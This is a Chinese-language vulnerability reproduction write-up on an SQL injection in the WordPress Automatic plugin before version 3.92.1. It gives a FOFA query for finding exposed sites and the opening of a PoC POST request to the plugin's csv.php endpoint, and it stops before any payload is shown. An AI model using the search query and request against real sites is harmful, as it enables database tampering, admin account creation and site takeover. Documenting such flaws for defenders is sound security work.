0x01 产品简介

WordPress Automatic（又称为WP Automatic）是一款流行的WordPress插件，旨在帮助网站管理员自动化内容创建和发布。该插件可以从各种来源（如RSS Feeds、社交媒体、视频网站、新闻网站等）获取内容，并将其自动发布到WordPress网站。

0x02 漏洞概述

WordPress Automatic 插件3.92.1之前版本中存在SQL注入漏洞，该漏洞源于插件的用户身份验证机制，威胁者可以绕过该机制执行恶意SQL查询，将任意SQL代码注入网站的数据库并实现权限提升。成功利用该漏洞可能获得对网站的未授权访问、创建管理员帐户、上传恶意文件，并可能完全控制受影响的网站。

0x03 影响范围

WordPress Automatic Plugin < 3.92.1

0x04 复现环境

FOFA：body="/wp-content/plugins/wp-automatic"

0x05 漏洞复现

PoC

POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;